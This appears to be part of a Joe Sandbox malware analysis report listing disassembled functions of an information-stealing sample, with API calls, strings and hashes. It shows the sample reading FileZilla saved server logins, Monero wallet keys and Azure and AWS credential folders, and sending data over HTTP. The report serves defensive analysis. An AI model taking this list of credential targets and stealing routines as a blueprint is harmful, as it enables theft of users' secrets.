                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00D40250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00D50DBA,00D50DB7,00D50DB6,00D50DB3), ref: 00D40362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D40369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00D40385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00D403CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D403DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00D40419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00D40463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D40532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00D40562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00D40571
                  • lstrcat.KERNEL32(?,url: ), ref: 00D40580
                  • lstrcat.KERNEL32(?,00000000), ref: 00D40593
                  • lstrcat.KERNEL32(?,00D51678), ref: 00D405A2
                  • lstrcat.KERNEL32(?,00000000), ref: 00D405B5
                  • lstrcat.KERNEL32(?,00D5167C), ref: 00D405C4
                  • lstrcat.KERNEL32(?,login: ), ref: 00D405D3
                  • lstrcat.KERNEL32(?,00000000), ref: 00D405E6
                  • lstrcat.KERNEL32(?,00D51688), ref: 00D405F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00D40604
                  • lstrcat.KERNEL32(?,00000000), ref: 00D40617
                  • lstrcat.KERNEL32(?,00D51698), ref: 00D40626
                  • lstrcat.KERNEL32(?,00D5169C), ref: 00D40635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D50DB2), ref: 00D4068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 5072b86b498d7439252f6ce6c01456aa53af2c891f59cf14d907bf66b88123ee
                  • Instruction ID: fcbd104fb874e8037ab379a477eee5d66443cd1d8fc90c72cb79b50c314b835c
                  • Opcode Fuzzy Hash: 5072b86b498d7439252f6ce6c01456aa53af2c891f59cf14d907bf66b88123ee
                  • Instruction Fuzzy Hash: 2BD13C76940208AFDB04EBF4DD96EEE7738EF58301F444418F506A6091EF74AA4ADB72
                  Function 00D35960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34839
                    • Part of subcall function 00D347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34849
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00D359F8
                  • StrCmpCA.SHLWAPI(?,00AFE9F8), ref: 00D35A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D35B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00AFEA38,00000000,?,00AFA4B0,00000000,?,00D51A1C), ref: 00D35E71
                  • lstrlen.KERNEL32(00000000), ref: 00D35E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00D35E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D35E9A
                  • lstrlen.KERNEL32(00000000), ref: 00D35EAF
                  • lstrlen.KERNEL32(00000000), ref: 00D35ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00D35EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00D35F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00D35F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00D35F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00D35FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00D35FBD
                  • HttpOpenRequestA.WININET(00000000,00AFEA08,?,00AFE218,00000000,00000000,00400100,00000000), ref: 00D35BF8
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • InternetCloseHandle.WININET(00000000), ref: 00D35FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: b5e0907a984053859dec3409c9791a0d83beff4487d75be37836d987c30af90f
                  • Instruction ID: f59f2884a2a78976414007f452cb29721616c2151e422e9bb89067594897d0a8
                  • Opcode Fuzzy Hash: b5e0907a984053859dec3409c9791a0d83beff4487d75be37836d987c30af90f
                  • Instruction Fuzzy Hash: 14121271860128ABEB15EBA4DC96FEEB378FF54700F514199B50A62091DF702A4ACF72
                  Function 00D3CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00D3D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D3D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D208
                  • lstrcat.KERNEL32(?,00D51478), ref: 00D3D217
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D22A
                  • lstrcat.KERNEL32(?,00D5147C), ref: 00D3D239
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D24C
                  • lstrcat.KERNEL32(?,00D51480), ref: 00D3D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D26E
                  • lstrcat.KERNEL32(?,00D51484), ref: 00D3D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D290
                  • lstrcat.KERNEL32(?,00D51488), ref: 00D3D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D2B2
                  • lstrcat.KERNEL32(?,00D5148C), ref: 00D3D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 00D3D2D4
                  • lstrcat.KERNEL32(?,00D51490), ref: 00D3D2E3
                    • Part of subcall function 00D4A820: lstrlen.KERNEL32(00D34F05,?,?,00D34F05,00D50DDE), ref: 00D4A82B
                    • Part of subcall function 00D4A820: lstrcpy.KERNEL32(00D50DDE,00000000), ref: 00D4A885
                  • lstrlen.KERNEL32(?), ref: 00D3D32A
                  • lstrlen.KERNEL32(?), ref: 00D3D339
                    • Part of subcall function 00D4AA70: StrCmpCA.SHLWAPI(00AF8FF8,00D3A7A7,?,00D3A7A7,00AF8FF8), ref: 00D4AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: a1cbafe99150af8c2f8ddfa9662bc0ae378ad510c56adb00aebe15902f35313b
                  • Instruction ID: 7d46167fd5de3d703ee042b840827eca6166c8be5be809d63a0df021ce106846
                  • Opcode Fuzzy Hash: a1cbafe99150af8c2f8ddfa9662bc0ae378ad510c56adb00aebe15902f35313b
                  • Instruction Fuzzy Hash: C9E16B72850108ABEB04EBA4DD96EEE7378FF58301F114158F506B2091EE34AE4ADB73
                  Function 00D3C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00AFD3E0,00000000,?,00D5144C,00000000,?,?), ref: 00D3CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00D3CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00D3CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D3CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00D3CAD9
                  • StrStrA.SHLWAPI(?,00AFD200,00D50B52), ref: 00D3CAF7
                  • StrStrA.SHLWAPI(00000000,00AFD218), ref: 00D3CB1E
                  • StrStrA.SHLWAPI(?,00AFDA40,00000000,?,00D51458,00000000,?,00000000,00000000,?,00AF8FC8,00000000,?,00D51454,00000000,?), ref: 00D3CCA2
                  • StrStrA.SHLWAPI(00000000,00AFDBE0), ref: 00D3CCB9
                    • Part of subcall function 00D3C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00D3C871
                    • Part of subcall function 00D3C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00D3C87C
                  • StrStrA.SHLWAPI(?,00AFDBE0,00000000,?,00D5145C,00000000,?,00000000,00AF8FE8), ref: 00D3CD5A
                  • StrStrA.SHLWAPI(00000000,00AF91C8), ref: 00D3CD71
                    • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B46), ref: 00D3C943
                    • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B47), ref: 00D3C957
                    • Part of subcall function 00D3C820: lstrcat.KERNEL32(?,00D50B4E), ref: 00D3C978
                  • lstrlen.KERNEL32(00000000), ref: 00D3CE44
                  • CloseHandle.KERNEL32(00000000), ref: 00D3CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 4593bedbba6156624a2912639046376800787040004d00db04344ae4c76fd370
                  • Instruction ID: 0ca7525d997da6b052d9da62189320141f446e2f654f7d485cdcc9097c6a357c
                  • Opcode Fuzzy Hash: 4593bedbba6156624a2912639046376800787040004d00db04344ae4c76fd370
                  • Instruction Fuzzy Hash: FDE1FB71950108ABEB15EBA8DC92FEEB778EF54300F414159F50676191EF306A8ACF72
                  Function 00D48320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  • RegOpenKeyExA.ADVAPI32(00000000,00AFB148,00000000,00020019,00000000,00D505B6), ref: 00D483A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00D48426
                  • wsprintfA.USER32 ref: 00D48459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00D4847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D4848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00D48499
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                  • Instruction ID: 624158d252c0dd665538311b2a6484ee3a063de433ea5c616cf7b73fe393cff7
                  • Opcode Fuzzy Hash: 3622df9801609cbcb1c1256ab7457576f9fab7b42c8ad82fa9b8ab2390fa08dc
                  • Instruction Fuzzy Hash: 5D81D97195011CABEB68DB54CC95FEEB7B8FF48700F008299E509A6180DF716A89DFB1
                  Function 00D44D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00D44DCD
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                    • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00D44E59
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                    • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                    • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00D44EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00D44EE5
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449B0
                    • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D508D2), ref: 00D449C5
                    • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D449E2
                    • Part of subcall function 00D44910: PathMatchSpecA.SHLWAPI(?,?), ref: 00D44A1E
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00AFEA18), ref: 00D44A4A
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FF8), ref: 00D44A5C
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A70
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,00D50FFC), ref: 00D44A82
                    • Part of subcall function 00D44910: lstrcat.KERNEL32(?,?), ref: 00D44A96
                    • Part of subcall function 00D44910: CopyFileA.KERNEL32(?,?,00000001), ref: 00D44AAC
                    • Part of subcall function 00D44910: DeleteFileA.KERNEL32(?), ref: 00D44B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
